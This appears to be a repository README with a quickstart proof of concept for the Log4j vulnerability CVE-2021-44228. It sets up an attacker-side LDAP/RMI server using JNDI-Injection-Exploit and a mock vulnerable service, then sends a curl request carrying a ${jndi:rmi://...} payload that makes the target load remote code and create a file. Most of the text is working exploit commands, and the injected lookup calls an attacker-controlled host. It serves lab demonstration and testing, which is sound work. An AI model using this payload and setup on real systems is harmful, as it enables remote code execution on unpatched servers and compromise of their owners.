/cve-2021-44228-log4j

cve-2021-44228-log4j

CVE-2021-44228

Quickstart

Concept

  • Attacker Server IP: 172.18.5.189
  • PRD Server IP: 172.18.5.191

Step1: Start LDAP/RMI Services. [On Attacker Server]

Download Jar: JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

Start Services.

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A "172.18.5.189" -C "touch /tmp/cve-2021-44228-log4j"

Output:

start-ldap-rmi-serices

Step2: Mock a PRD Service. [On PRD Server]

Download Jar: log4jRCE-0.0.1-SNAPSHOT.jar

Run Services.

java -jar log4jRCE-0.0.1-SNAPSHOT.jar

Service run on 8080. This Service will logging whatever be sent to /login API.

mock_prd_service

Step3: Make a request to PRD Service. [Any Servers]

curl -X POST 'http://172.18.5.191:8080/login' --data-urlencode 'data=${jndi:rmi://172.18.5.189:1099/spring}'

Result:

make_a_request

Temp file has been created.

tmp_file

Reference